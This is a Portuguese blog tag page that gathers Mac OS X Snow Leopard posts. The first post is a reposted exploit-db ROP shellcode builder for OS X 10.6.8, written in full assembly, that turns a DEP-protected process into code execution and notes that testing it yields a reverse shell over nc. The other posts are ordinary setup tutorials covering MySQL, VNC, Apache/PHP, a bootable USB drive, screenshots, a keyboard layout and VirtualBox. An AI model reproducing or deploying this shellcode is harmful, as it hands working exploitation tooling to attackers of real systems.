Browsed by
Tag: snow

OSX universal ROP shellcode Testado no SNOW LEOPARD

OSX universal ROP shellcode Testado no SNOW LEOPARD


; universal OSX dyld ROP shellcode
; tested on OS X 10.6.8
;
; if you don't want to compile, copy stage0 code from precompiled.txt
; and append your normal shellcode to it.
;
; usage:
; - put your 'normal' shellcode in x64_shellcode.asm
; - make
; - ./sc
;
; if you want to test:
; - uncomment lea rsp, [rel rop_stage0] / ret
; - make
; - nc -l 4444
; - ./sc
; - you should get a shell over nc
;
; see my blog, if you want to know how this works:
; http://gdtr.wordpress.com
;
; greets to Jacob Hammack, for his reverse tcp shellcode (hammackj.com).
;
; pa_kt
; twitter.com/pa_kt

extern _printf

global _main

;————————————————–
;- DATA
;————————————————–
section .data

rw_area equ 0x00007FFF5FC50000
rwx_area equ rw_area+0x1000
vm_prot equ 0x00007FFF5FC0D356
fake_stack equ rw_area+0x2000
fake_frame equ fake_stack+0x100
r12_zero equ rw_area-0x1000

rax_off equ rw_area-8
rbx_off equ rw_area+8-8
rcx_off equ rw_area+0x10-8
rdx_off equ rw_area+0x18-8
rsi_off equ rw_area+0x28-8
rbp_off equ rw_area+0x30-8
rsp_off equ rw_area+0x38-8
r8_off equ rw_area+0x40-8
r12_off equ rw_area+0x60-8

pop_rdi equ 0x00007FFF5FC24CDC
pop_rbx equ 0x00007FFF5FC23373
store_reg equ 0x00007FFF5FC24CE1
set_regs equ 0x00007FFF5FC24CA1

c_rwx equ 7
c_size equ 0x1000
c_addr equ rwx_area
c_set_max equ 0

dbg_ret equ 0x00007FFF5FC24C4B

; copy shellcode to RWX area
; size = 0x1000
stub:
lea rsi, [r15+saved_rsp_off+copy_stub_size+rop_post_size]
xor rcx, rcx
inc rcx
shl rcx, 12 ;rcx = 0x1000
lea rdi, [rel normal_shellcode]
rep movsb
;int 3
normal_shellcode:

stub_size equ $-stub

; order is important
rop_pre dq pop_rdi, rcx_off, pop_rbx, c_set_max, store_reg,
dq pop_rdi, rdx_off, pop_rbx, c_size, store_reg,
dq pop_rdi, rsi_off, pop_rbx, c_addr, store_reg,
dq pop_rdi, rbp_off, pop_rbx, fake_frame, store_reg,
dq pop_rdi, rsp_off, pop_rbx, fake_stack, store_reg,
dq pop_rdi, r8_off, pop_rbx, c_rwx, store_reg,
dq pop_rdi, r12_off, pop_rbx, r12_zero, store_reg,

; set fake stack
dq pop_rdi, fake_stack+8-8, pop_rbx, vm_prot, store_reg,

; set fake frame (return address -> rwx page)
dq pop_rdi, fake_frame-8-0x38, store_reg,
saved_rsp:
dq pop_rdi, fake_frame+8-8, pop_rbx, rwx_area, store_reg,

rop_pre_size equ $-rop_pre
saved_rsp_off equ $-saved_rsp-8

rop_post dq dbg_ret

; set all regs and jump to vm_prot
dq pop_rdi, rw_area, set_regs
; marker
; dq 0x1111111111111111

rop_post_size equ $-rop_post

x64_shellcode: incbin “x64_shellcode”
x64_shellcode_size equ $-x64_shellcode

hello db “test”, 0
fmt db “\x%02x”,0

section .bss

rop_stage0 resq 100
copy_stub resq ((stub_size+7)/8)*5
copy_stub_size equ $-copy_stub

;————————————————–
;- CODE
;————————————————–
section .text

prep_stub:

mov rcx, (stub_size+7)/8
mov rsi, stub
mov rdi, copy_stub
mov rbx, rwx_area-8
go:
mov rax, pop_rdi
stosq
mov rax, rbx
stosq
mov rax, pop_rbx
stosq
movsq
mov rax, store_reg
stosq
add rbx, 8
loop go
ret

make_stage0:
mov rsi, rop_pre
mov rdi, rop_stage0
mov rcx, rop_pre_size
rep movsb

mov rsi, copy_stub
mov rcx, copy_stub_size
rep movsb

mov rsi, rop_post
mov rcx, rop_post_size
rep movsb

mov rsi, x64_shellcode
mov rcx, x64_shellcode_size
rep movsb

ret

print_it:
push rbp
mov rbp, rsp

mov rcx, rop_pre_size + copy_stub_size + rop_post_size + x64_shellcode_size
lea rsi, [rel rop_stage0]
xor rax, rax
one_char:
lodsb
push rsi
push rcx
mov rsi, rax
mov rdi, qword fmt
xor rax, rax
call _printf
pop rcx
pop rsi
loop one_char

leave
ret

_main:
push qword rbp
mov rbp, rsp

call prep_stub
call make_stage0

call print_it

;lea rsp, [rel rop_stage0]
;ret

leave
ret

Fonte: http://www.exploit-db.com/exploits/17564/

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

Bom, pessoal, nós do app gostaríamos de detalhar algo.
NÃO precisa ter senha de root para operar o mysql, isto dá-se em detrimento ao poder de root, porém com certas restrições que cada usuário do sistema possui.

Se eu quiser entrar no mysql para criar base de dados e trabalhar com o bd (após seguir nosso how to de instalação do apache, php, e mysql no mac os x lion ou instalação do apache, php, e mysql no mac os x snow leopard

mysql
mysql

) basta fazer o seguinte:

Mac-Pro-de-little-oak:etc little_oak$ sudo /usr/local/mysql/bin/mysql –user=little_oak

Pronto, você precisa lembrar que –user=little_oak deve ser susbsituído por –user=usuário_do_SEUMAC

Depois disso trabalhe normalmente.

Perceba uma coisa forte, o MAC OS X não precisa de root para fazer as coisas (dentro do mysql), ele já sabe que você, usando sudo É O CARA, por isso basta rodar este comando no terminal:

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql –user=little_oak

Troque o little_oak por seu usuário. Depois disso é só alegria.

Abraços galera e clique em SHARE, please!

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Bom, galera, nós do 4ppun1x conectamos remotamente neste bsd maravilhoso que é o mac afim de que pudéssemos fazer ajustes remotos em nosso pc. Este how to resume-se em habilitar o suporte VNC do mac juntamente com uma senha de segurança para que nosso mac fique tranquilo e seguro para aceitar conexões de rede sem qualquer stress.
Estamos usando o mac os x Snow Leopard (mas funciona no mac os x lion), assim como uma conexão comum (feita de um router wireless) e usando Windows (ops, ruindows) seven e o cliente vnc TightVNC (mostraremos o link de download), que além de free atende bem pra caramba.
Bora simbora e deixar de balela?

Primeiro devemos adentrar nas preferências do sistema afim de irmos aos menus principais de configurações do mac, acompanhe o print:

Clicando no menu de preferências do mac
Clicando no menu de preferências do mac

Agora iremos clicar no menu de preferências:

menus principais SHARING
menus principais SHARING

Pronto, devemos ir na área de Sharing (ali liberamos apache, acesso remoto, compartilhamento de arquivos e etc):

Marcando acesso remoto
Marcando acesso remoto

Assim que marcamos a opção REMOTE MANAGEMENT o menu do print acima é exibido.

Iremos comentar cada opção marcada:

1 – Observe (modo de observação), marcamos o control para permitir controle por parte do acesso remoto (neste caso nosso pc Window$ 7), A opção de mostrar quando há alguém observando o pc é bom de estar marcada (é, meu amigo, alguém dentro e você sem saber é osso né?),

2 – Generate Reports é bom estar marcado pois gera logs (vai que alguém faz besteira?),

3 – Open and Quit app… Deixa marcado, afinal de contas isto habilita o suporte para o cliente remoto poder executar aplicativos,

4 – Change Settings, bem, em um caso de setup, por que não deixar ativo? Vale a pena sim! Se você precisar de um ajuste aqui ou ali deve ter isto ON.

5 – Delete e replace items é bom, afinal de contas direito de escrever, ler e executar, para acesso remoto é quase um padrão.

6 – Start text… é bom quando se quer trocar idéia com o cliente remoto, deixamos on.

7 – Restart and Shutdown, meu amigo, se alguém precisa aplicar mudanças críticas e positivas em seu Mac Os X, por que não deixar este recurso para o acesso remoto? Se achar inviável que alguém remotamente desligue seu apple, deixe isto desmarcado.

8 – Suporte a cópia de itens é bom ;), deixe on.

Assim que damos ok é solicitada autorização do user afim de que seja validada a mudança, mas para que isto ocorra de verdade devemos clicar na opção COMPUTER SETTINGS para poder deixar a coisa no ponto (é aqui que aplicamos a senha de acesso remoto, afinal de contas deixar um mac com todos os recursos globais e ainda deixar sem senha é tiro de calibre 12 no próprio pé, né?

Aplicando senha e confirmando
Aplicando senha e confirmando

Deixe em vnc viewers a senha (coloque algo usando caracteres especiais para dificultar a vida dos lamers, use #$%&*@./<> com caracteres de senha).

Assim que aplicar você precisará confirmar usando sua senha de usuário do sistema, confirme com sua senha (vide print a seguir):

Confirmar senha no Mac Os X
Confirmar senha no Mac Os X

Pode ser que nós (appunix e você), algum dia, nesta vida de trabalhador braçal, possamos nos perguntar?

Como descubro meu ip nesse danado desse mac?

Relaxa, lembra do esquema de Central das preferências do mac? Então, a gente confirmar o Sharing e volta lá, no menu networking, ou seja: Preferências do Sistema-> Network.

Veja o ícone no MEIO da central de preferências:

Centralizador de Preferências do Mac Os X
Centralizador de Preferências do Mac Os X

Pronto, depois é só clicar em Redes (Network) e meter bala, veja o danado do IP no MEIO da nova tela:

Olha o ipzão aí gente
Olha o ipzão aí gente

 

Pronto, já temos o ip em mãos, no meu caso a terminação é 104. O que devemos fazer?

No Microsoft Windows 7 devemos baixar o cliente VNC Free, para isso acesse o linkÇ

http://www.tightvnc.com/download/1.3.10/tightvnc-1.3.10-setup.exe

Baixe o cliente e em seguida abra-o.

Assim que executar o tightvnc você vai ver a seguinte tela:

cliente VNC
cliente VNC

Assim que confirmar o acesso ele vai mostrar uma tela requisitando senha, igual essa aqui ó:

senha VNC
senha VNC

Confirme com aquela senha que você definiu nas propriedades de acesso remoto de seu macosx e FINISH!

 

Curtiu?

Curtimos também.
Abraços a todos e obrigado pela visita!

Como instalar PHP, Apache e Mysql no Mac Os X Snow Leopard (mamp2 no mac)

Como instalar PHP, Apache e Mysql no Mac Os X Snow Leopard (mamp2 no mac)

Este é um artigo daqueles “easy-to-use”, aonde instalaremos o apache 2, o php 5 e o mysql 5 para que possamos programar sossegadamente (fazer um webserver para hospedar nossa aplicação localmente).
O sistema operacional usado aqui foi o Mac Os X Snow Leopard 10.6.7, mas o procedimento é o mesmo para 10.6.8.

Vamos para o fight?
Iremos usar o console do Mac os x, assim como o ports do Mac para gerenciar o trem com velocidade.
Façamos o seguinte, clique em terminal (veja a imagem abaixo):

como abrir terminais no mac os x
como abrir terminais no mac os x

Clicando lá você fará o seguinte:

Little-oaks-appunixlabs:~ sudo apachectl start

Isto fará com que você chame recursos globais como super usuário e ative o serviço do apache 2 dentro do seu Mac os x, LEMBRANDO que será requisitada a senha de superusuário para que você possa rodar este recurso, pois o sudo te dá poder de root para executar um determinado comando, como neste caso tomtamos o exemplo do apachectl.

Para conferir que o procedimento deu certo abra seu navegador web (no nosso caso curtimos muito o Mozilla Firefox, mas fica ao seu critério o navegador [isto não influenciará em nada neste how to]), conforme imagem abaixo, na barra de endereços digite

Apache ok
Apache ok

HTTP://localhost

Nosso segundo ponto e muito importante é entrar no arquivo de configuração do apache 2 afim de habilitarmos o suporte ao PHP, vamos por a mão na massa? Estamos usando o VIM, um editor muito eficaz e leve (todos que já amaram o vi um dia com certeza amam/amarão o vim):

Little-oaks-appunixlabs:~ sudo vim /etc/apache2/httpd.conf

 

Dentro deste arquivo devemos remover o comentário da linha abaixo:

LoadModule php5_module libexec/apache2/libphp5.so

Recomendo que aperte a tecla / no vim e digite php5, você já vai cair em cima da linha a ser descomentada, em seguida, no sinal de libra (#), caminhe até ele e aperte x
Isto nos deixará com suporte ao PHP, depois basta apertar ESC e digitar isto:
:wq!
Assim que pressionar ENTER o arquivo será salvo.
Vamos explicar o por que de :wq!

: representa comando para o arquivo
W representa ESCREVER
Q representa QUIT (sair)
! representa EXECUTAR as instruções informadas

Para finalizarmos o suporte ao php precisamos rodar o seguinte comando:

Little-oaks-appunixlabs:~ sudo apachectl restart

É mania de todos criar um arquivo com a função phpinfo() contida nele, porém, se fizermos isso “de cara” o apache vai exibir muitos warnings (interpretados pelo php) por questões de permissões e de existência do arquivo php.ini. Para sanarmos isto deveremos fazer o seguinte:

Little-oaks-appunixlabs:~ cd /etc
Little-oaks-appunixlabs: sudo cp php.ini.default php.ini
Little-oaks-appunixlabs: sudo chmod 666 php.ini

Estamos copiando o php.ini default do /etc (área de arquivos de configurações em Unix-like systems) e atribuindo permissões 666 (dono pode ler e escrever no arquivo, grupo também e demais também).
No arquivo php.ini temos de localizar o trecho aonde o TimeZone é identificado (mas está comentado). É muito importante mudar esta linha e ajustarmos nosso timezone corretamente, pois isto nos dará um horário adequado. Para isto devemos proceder da seguinte forma:
Little-oaks-appunixlabs: sudo vim php.ini
Em seguida aperte a tecla / para localizar um termo, informe o seguinte date.timezone, isto lhe deixará na linha acima da que precisamos mudar. Descomente a linha abaixo para que fique assim:
date.timezone =

Você removerá o ; apertando x em cima dele. Para deixarmos o vim em modo de edição de arquivos precisamos apertar a tecla i, isto nos dará poder de editar o arquivo (saindo de modo comando).
Agora iremos colocar depois do = o seguinte:
America/Sao_Paulo
Então o resultado final será —> date.timezone = America/Sao_Paulo
Dê ESC e digite
:wq!
Aperte ENTER e terá o arquivo salvo.

 

As vezes você pode estar se perguntando:

Poxa, mas meu timezone não tem nada a ver com o de Sampa, o que faço?
Relaxa, rapá! A galera do Appunix pensou em você! Abaixo segue a lista de timezone da América:
http://www.php.net/manual/en/timezones.america.php

Se mesmo assim não lhe agradar você pode usar os globais:
http://www.php.net/manual/en/timezones.others.php

Mas é impossível você não se agradar dos timezones da América, são repletos.
Os mais comuns que são usados são:
America/Porto_Velho
America/Noronha
America/Rio_Branco
America/Recife
America/Sao_Paulo
America/Porto_Acre
Mas escolha o que mais lhe agradar.

Assim que decidir qual seu TimeZone você deve reiniciar o apache para reler o php.ini e ativar o negócio:
Little-oaks-appunixlabs: sudo apachectl restart

Agora precisamos instalar o Mysql 5 para que possa trabalhar da forma que almejamos.
Para irmos direto ao ponto acesse o link abaixo:
http://dev.mysql.com/downloads/mysql/5.1.html#macosx-dmg
Se cuide para baixar a versão ideal para você.
Aí é 64 bits? Não sabe como é? Quer saber como seu Mac Os X Snow Leopard está operando? Clique na maça, depois clique em Sobre Este MAC, em seguida clique em Software (Categoria) e procure pela linha Kernel de 64-bit e Extensões: Sim (conforme a foto abaixo):

como ver informações do seu mac os x
como ver informações do seu mac os x

Caso seja Sim é 64 bits (x86_64), então baixe o pacote para 64 bits.
Vamos simbora?
Baixe o arquivo x86_64 no formato DMG.

baixar pacote mysql 64 bits (DMG)
baixar pacote mysql 64 bits (DMG)

Quando você clicar no formato DMG automaticamente o site da Mysql vai te convidar a logar-se lá com eles, mas basta prestar a atenção (conforme imagens abaixo) para não precisar perder tempo com esta burocracia, se você quer baixar direto (melhor Né?) basta fazer o seguinte, clique no link abaixo:
HTTP://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.58-osx10.6-x86.dmg/form/http://mysql.cce.usp.br/
Deixa o download terminar siga os passos das fotos abaixo (literalmente instalar o mysql e seu ícone), Devemos concluir os passos extras para adição do Mysql como sendo parte do painel administrativo, para isto siga os passos abaixo:

passo1
passo1

 

Feito isto iremos confirmar se o mysql está rodando com o seguinte comando:

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql

Feito isto iremos reiniciar o apache 2 para garantir que o nosso servidor está integrando literalmente tudo, faremos com o seguinte comando:

Little-oaks-appunixlabs: sudo apachectl restart

Para conferirmos tudo vamos entrar dentro da nossa pasta pessoal, na pasta Sites e criar um arquivo chamado index.php. Dentro dele iremos colocar o seguinte (ISTO EM /Library/WebServer/Documents):
Ou seja -> sudo vim /Library/WebServer/Documents/index.php

< ?php phpinfo(); ?>

Teremos liberadas extensões como PDO (Muito boa para abstração no banco de dados mysql), Mysqli (a versão aprimorada do conector nativo do Mysql [somente disponível a partir do Mysql 5.x])
Pronto, feito isto instalamos o Mysql 5 , Php 5 e Apache 2 em nosso Mac Os X :D.
Abraços a todos e saibam que o AppUnix aprecia sua visita!

Como criar pendrive bootável do Mac OS X Lion

Como criar pendrive bootável do Mac OS X Lion

Olá galera tudo tranqüilo?
Com a chegada da nossa versão final do Mac OS X Lion pairou sobre nossas cabeças como seria se precisácemos fazer uma instalação do ZERO em nossos iGadgets… Com o upgrade sendo feito através do App Store fica essa dúvida na cabeça dos usuários… De acordo com a Apple caso o usuário queira uma instalação Limpa, o mesmo terá que instalar o Snow Leopard fazer update até a versão 10.6.6 e ai, só depois dessa trabalheira toda você será capaz de subir para o Lion (o que na verdade já não é mais uma instalação limpa.. venhamos e convenhamos Apple, isso não é instalação limpa)… mas deixemos de mazela e vamos ao que interessa…. hoje vou ensinar como criar um pendrive bootável com a versão Build final (11A494) do Mac OS X Lion….
O que você precisará:

—> 1 computador rodando Mac OS X Snow Leopard (pode ser Hackintosh)
—> o .app do Mac OS X Lion (isso mesmo galera… o Sistema operacional vem como .app)
—> 1 pendrive de no mínimo 8GB (poderia ser 6Gb, mas como nunca ví estou indicando um de 8)
—> 15 minutos pra ler esse artigo

Galera primeira coisa a se fazer é preparar o pendrive… vá até o Utilitário de Disco, no painel superior | Ir/Utilitários

Lion

Entre em Utilitário de Disco
Lion_1

Chegando ao Utilitário verá uma tela mais ou menos assim
Lion_2

No painel da esquerda selecione o disco onde deseja que o Lion faça sua moradia… No caso um Kingston Datatraveler de 8.01 GB
Lion_3

Na aba de ações escolha Particionar
Lion_4

Em esquema de volume e Informações de Volume coloquei respectivamente 1 Partição e nome coloquei Lion (pode se usar qualquer nome, pois o mesmo será substituído posteriormente)
Lion_5

No canto inferior direito clique em Aplicar
Lion_6

Será notificado sobre as notificações no Disco
Lion_7

Mande particionar. Acabamos a primeira etapa….
Agora pra adiantar as coisas baixe o aplicativo ShowAllFiles
Executeo e claque em Show

Lion_8

Agora vá até seu .app que baixou da App Store, claque com o botão direito do mouse e claque em Mostrar Conteúdo do Pacote
Lion_9

Como na imagem entre na pasta Contents depois na pasta SharedSupport chegará até nosso primeiro arquivo importante…. execute o arquivo de imagem InstallESD.dmg
Lion_10

Ao executá-lo verá uma tela semelhante a essa
Lion_11

Agora execute o BaseSystem.dmg
Lion_12

Chegará a essa tela
Lion_13

Agora volte ao Utilitário de Disco, na guia onde usamos para Particionar o disco de destino do Lion, clique em Restaurar
Lion_14

Em Fonte arraste Mac OS X Base System (que foi montado quando executamos o BaseSystem.dmg)
Lion_15

Em destino arraste seu pendrive para label (em nosso caso o chamamos de Lion)
Lion_16

Ficando assim a tela completa
Lion_17

Clique em Restaurar no canto inferior Direito
Lion_18

Será notificado, clique em Apagar
Lion_19

Digite sua senha
Lion_20

Todo o processo demora em torno de 5 minutos…. agora falta pouco galera… muito pouco… Agora amigos vá até o disco Mac OS X Install ESD
Lion_21

Agora copie a pasta Packages para a área de transferência (Command+C)
Lion_22

Agora vá no pendrive (que agora chama-se Mac OS X Base System)… pra facilitar na identificação do local correto, aconselho verificar a ordem dos dispositivos montados (em todos meus teste por ter sido o ultimo a ser montado em todo o processo o pendrive fica como sendo o ultimo da lista)
Lion_23

No seu pendrive vá em System/Installation
Lion_24

Exclua o atalho para  a pasta Packages que ali se encontra
Lion_25

Lembram da pasta Packages que copiamos lá do Mac OS X Install ESD?
é pra cá que vamos copialo, é uma cópia um pouquinho demorada (já que estamos falando de 3.26 GB e para um dispositivo com velocidade de gravação baixa)
Lion_26

Agora é só correr para o abraço… pode usar tanto no seu Mac verdadeiro quanto no seu Hackintosh (com o devido CdBoot… Aconselho CdBoot feito pelo André do HMBT…que funciona desde de o DP4 do Mac OS X Lion)…
Abraço a todos… Espero que ajude a todos… Obrigado aos vários fóruns sobre Mac OS, OSX86 que existem por ai… em especial à toda staff do HMBT (http://www.hmbt.org/forum)
Fui!!!! :D

Gostou? Comente, complemente e espalhe!

Como fazer printscreen no Mac Os X Leopard | Snow Leopard

Como fazer printscreen no Mac Os X Leopard | Snow Leopard

Um tarefa mais simples, porém menos produtiva junto ao Windows é “printar” uma tela.
Sim, é simples, teclando PrintScreen temos uma imagem na memória e basta abrir um programa, como por exemplo Paint Brush e colar (CTRL+V) e temos a imagem lá. Se salvarmos encontraremos um BMP ultra pesado e com qualidade precária.

No Mac Os X, apesar de ser diferente, a idéia de prints no Mac é bem superior ao Windows. Veja pela lógica, bater um print normalmente é algo para uma produção corriqueira (printar uma tela para em seguida enviar uma imagem de erro para alguém como parte de um report), printar para fazer montagens em editores profissionais como Photoshop, por exemplo.

No caso do Mac Os X, a mentalidade dos desenvolvedores é muito inteligente, veja por que:

1 – Maior parte das alternativas de prints salva na área de trabalho,

2 – Os prints salvos automaticamente no Desktop SÃO EM FORMATO PNG. (acredite, a qualidade/consistência desse formato são violentíssimos).

 

Vamos aos comandos?

 

1 – Printando uma tela e armazenando a imagem no desktop em formato PNG:

command+shift+3

2 – Printando uma tela a qual poderemos marcar o campo de print com o cursor do mouse:

command+shift+4

3 – Printando uma tela de forma que seu cursor selecione a janela que possa ser printada:

command+shift+4+posterior toque na barra de espaço

4 – Printando uma tela para armazena-la na memória de forma que possamos colocar a imagem em um programa profissional (Photoshop, por exemplo):

command+shift+3+ctrl, command+shift+4+ctrl, command+shift+4+posterior toque na barra de espaço+ctrl

 

É possível mudar o formato das imagens salvas? SIM!

Para mudar o formato você precisa entrar no console e digitar:

defaults write com.apple.screencapture type pdf

 

Posso voltar para PNG? SIM!

defaults write com.apple.screencapture type png

 

Baseado em: http://www.infoblogs.com.br/view.action?contentId=16627&Como-fazer-print-screens-no-Mac-OS-X.html

Teclado ABNT2 on Mac OS X | Hackintosh Snow Leopad

Teclado ABNT2 on Mac OS X | Hackintosh Snow Leopad

Olá galera tudo na paz?

Hoje venho mostrar a vocês que estão tendo dificuldades com teclado ABNT2 em seu Mac/Hackintosh rodando Mac OS X Snow Leopard. Existem por ai MUITOS métodos dizendo fazer funcionar perfeitamente Teclado ABNT2 mas, sua grande maioria são layouts falhos… onde algumas teclas ficam sem funcionar ou adquirem funçoes diferente do que as que realmente têm… Após bastante tempo usando um teclado Apple ( layout Inglês Internacional) tanto em meus Hackintosh quanto no MacBook, não sentia necessidade de postar uma solução para ABNT2 aqui no blog… Só que com a vinda de MR. Little_Oak para nosso mundo Mac OS X, foi necessário pesquisar uma maneira de deixar a coisa bem funcional… pesquisei MUITO e pra falar a verdade quando estava quase desistindo encontrei uma solução, posso dizer que esse rapaz/menino/homem que fez isso é o CARA…. eu inclusive tentei por várias vezes editar alguns layouts existentes, mas sem sucesso… falatavam teclas e outros probleminhas…. mas vamos ao que interessa.

Siga as instruções abaixo e em menos de 15 minutos terá o seu querido teclado em ABNT2 funcionando corretamente

EDIT: Pessoal caso queiram(até indico) podem continuar seguinto esse how-to para que cheguem ao fim com teclado ABNT2 funcionando plenamente… há um artigo mais recente no blog em que publico um .PKG (instalador no Mac OS X) que faz todo o trabalho que ensino a fazer manualmente aqui, ele faz automáticamente… aconselho a leitura para fins de conhecer melhor o sistema Mac OS, mas aconselho tbm a leitura do artigo https://www.appunix.com.br/howto/mac-os/teclado-abnt2-mac-os-x-hackintos-lion/ onde como disse acima publico um .PKG desenvolvido por mim para facilitar a vida dos Mac Users e Hackntoshers de plantão…

1.    Baixe e abra o arquivo compactado.Aqui
2.    Na pasta em que o arquivo foi descompactado, localize o arquivo Brazilian ABNT2.bundle.

ABNT2_budle

3.    Copie este arquivo para a pasta ~/Library/Keyboard Layouts (para que o layout fique disponível apenas para o seu usuário) OU /Library/Keyboard Layouts/ (para que o layout fique disponível para todos os usuários).

ABNT2_bundle2

4.    Será necessário fazer Logout (Finalizar Sessão) e entre novamente no sistema para que o layout seja carregado.

Logout

5.    Vá em Preferências do Sistema (System Preferences)
Preferencias_Sistema

6.     Vá em Idioma & Texto (Language & Text). No guia Input Sources (Fonte de entrada/Layouts de Teclado)
Input_Sources

 

7.    Procure/Selecione Brasileiro ABNT2 (Brazilian ABNT2).
Select_ABNT2

 

8.    Após marcar ficará disponível no painel superior a opção Brasileiro ABNT2 (Brazilian ABNT2)

Painel_superior

9.    Marque o layout desejado (Brazilian ABNT2) .

Painel_ABNT2

 

Pronto, agora você pode usar o teclado normalmente.(diga-se #alegria)

Mapeamento das Teclas
Teclas mapeadas de acordo com o layout mostrado na Wikipedia:

Normal

‘  1  2  3  4  5  6  7  8  9  0  –  =
q  w  e  r  t  y  u  i  o  p  á  [
a  s  d  f  g  h  j  k  l  ç  ã  ]
\  z  x  c  v  b  n  m  ,  .  ;  /

Shift

”  !  @  #  $  %  ä  &  *  (  )  _  +
Q  W  E  R  T  Y  U  I  O  P  À  {
A  S  D  F  G  H  J  K  L  Ç    }
|  Z  X  C  V  B  N  M  <  >  :  ?

AltGr

¬  ¹  ²  ³  £  ¢  ¬  {  [  ]  }  \  §
/  ?  €  ®  ŧ  ←  ↓  →  ø  þ  ´  ª
æ  ß  ð  đ  ŋ  ħ     ĸ  ł  á  ~  º
º  «  »  ©  “  ”     µ  ─  ·  ạ  °

AltGr + Shift

¬  ¡  ½  ¾  ¼  ⅜  ¨  ⅞  ™  ±  °  ¿  ą
/  ?  €  ®  Ŧ  ¥  ↑  ı  Ø  Þ    ā
Æ  §  Р ª  Ŋ  Ħ     &  Ł  ő  ^  º
ă    © 
  ‘     µ  ×  ÷  ȧ  ¿

Pessoal posso garantir a vocês que esse é o melhor Layout para Teclado ABNT2 que existe na WEB, esse muleque merece/merecia o prêmio Nobel.A maioria da soluções usadas antes de chegar a essa eu ficava sem ? (interrogação) e as teclas | e \ (pipe e contra-barra) ficavam invertidas com ” e (aspas duplas e aspas simples) . Eu particurlarmente gosto muito do layout Inglês Internacional, mas há pessoas que não se adaptam ou não gostam de tal, esse how-to espero que sirva de referência para uma melhor esperiência para novos usuários do sistema operacional Mac OS X Snow Leopard (10.6.X).

Abraço a todos. :D

Fonte

Como criar uma VM_Máquina Virtual Linux Ubuntu no Mac OS X Snow Leopard

Como criar uma VM_Máquina Virtual Linux Ubuntu no Mac OS X Snow Leopard

Olá galera, hoje vou ensina a vocês como criar um ambiente de testes e estudos Linux no seu Mac, para ser mais direto iremos usar a FANTÁSTICA Distribuição da Canonical, o UBUNTU LINUX 10.04.  Em outras palavras ensinarei como criar uma VM (linguajar popular para Máquina Virtual – Virtual Machine) com VIRTUAL BOX da Oracle(Antes era da SUN) no Mac OS X Snow Leopard.

Após baixar o VIRTUAL BOX aqui. Que além de muito bom é totalmente Free.

Dê um Duplo claque no mesmo para montar o .DMG…

Aparecerá a seguinte tela

Tela_Instalacao
Tela_Instalacao

Dê um duplo claque em VirtualBox.mpkg o que voltará a seguinte mensagem

Tela_Instalacao2
Tela_Instalacao2

Clique em Continuar

Aparecerá outra tela assim

Tela_Instalacao3
Tela_Instalacao3

Clique novamente em continuar

Agora aparecerá a tela contendo a Licença de Uso do programa

Tela_Instalacao4
Tela_Instalacao4

Clicando em continuar o programa perguntará se vc concorda com a Licença de Uso, clique em AGREE (Se quiser prosseguir com a instalação :D)

Tela-Instalacao5
Tela-Instalacao5

Depois dos blablablas de licença (brincadeira são muito importantes as licenças de todos softwares), chegamos ao ponto de escolher o local da instalação, nós do appunix recomendamos deixar o local padrão

Tela_instalacao6
Tela_instalacao6

Clicando em Instalar no canto inferior Direito,você será solicitado a entrar com sua senha

Tela_Instalacao7
Tela_Instalacao7

Depois de colocar a senha o processo de instalação seguirá normalmente até uma tela igual a essa

Tela_Instalacao8
Tela_Instalacao8

Agora vamos iniciar nossa VM para instalação do sistema desejado,em nosso caso Ubuntu 10.04 LTS. No Menu Superior do seu Mac vá ate o Menu Ir (Go) -> Aplicativos (Aplications)

Tela_9

Dentro da pasta Alicativos (Aplications) procure pelo Nome/Icone VIrtualBox

Tela_10
Tela_10

Dê um duplo clique e aparecerá a seguinte interface

Interface_Virtual
Interface_Virtual

Agora vamos criar um nova VM (Virtual Machine – Máquina Virtual)

Clique em NOVO no canto superior esquerdo

Botao_Novo
Botao_Novo

O programa te dará boas vindas

Nova_VM
Nova_VM

Clique em Continuar

Nessa próxima tela o Virtual BOX  pedirá um NOME para a VM (Virtual Machine – Máquina Virtual) e o SISTEMA OPERACIONAL que será instalado em nossa VM, no nosso caso a VM se chama AppUnix e a o SISTEMA OPERACIONAL é o Linux Ubuntu

Nova_VM1
Nova_VM1

Agora é hora de determinar quanto de memória RAM da sua maquina irá para a VM (Virtual Machine – Máquina Virtual), em nosso caso como temos uma máquina modesta com apenas 2GB de RAM colocamos 512MB para a VM (Virtual Machine – Máquina Virtual), o que se mostrou suficiente para nossas necessidades nessa VM.

Memoria_VM
Memoria_VM

Agora devemos determinar configurações para o HD da nossa VM (Virtual Machine – Máquina Virtual), no nosso caso resolvemos criar um novo disco (se você é iniciante recomendamos que faça o mesmo)

HD_VM
HD_VM

Ele dá boas vindas ao utilitário de criação de Discos Rígidos Virtuais

HD_VM2
HD_VM2

Clique em Continue, você receberá a seguinte Tela

HD_VM3
HD_VM3

Opatamos por um disco de tamanho Fixo, mas vc pode usar Armazenamento Expandido Dinânmico que, é um disco inicialmente montado com o menor espaço possível necessário para a instalação do sistema e expandido dinamicamente de acordo com a necessidade do usuário mas sem a necessidade de configuração manual(A expansão é feita sem intervenção do usuário, quase que imperceptível ao usuário)

Na Etapa seguinte precisamos delimitar o tamanho desejado para o HD (no nosso caso é 8GB)

HD_VM4
HD_VM4

Clique em Continue no canto inferior Direito.Aparecerá um resumo com o Tipo, Localização e Tamanho do Disco

HD_VM5
HD_VM5

Clique em Done para prosseguir com a criação do nosso DISCO VIRTUAL

Segue Screenshot processo de criação do Disco

HD_VM6
HD_VM6

Após terminado o processo de Criação do DIsco veremos

Execucao_1
Execucao_1

Dê um Continue

No passo seguinte será pedido a Origem do disco de Instalação

Execucao_2
Execucao_2

Você pode usar um CD/DVD comum ou uma imagem de disco .ISO (recomendamos .ISO pela velocidade proporcionada pelo mesmo)

No nosso caso usamos uma .ISO, então teremos que clicar na pastinha para mostrar ao Virtual BOX onde se encontra nossa .ISO

Execucao
Execucao

Chegaremos a seguinte tela

Execucao_3
Execucao_3

Clique em Adicionar no canto superior esquerdo

Execucaoo
Execucaoo

Vá até onde está salva sua .ISO selecione-a e claque em Abrir no canto inferior Direito

EXEcucao_4
EXEcucao_4

Ficará a tela seguinte desa forma

Execucao_5
Execucao_5

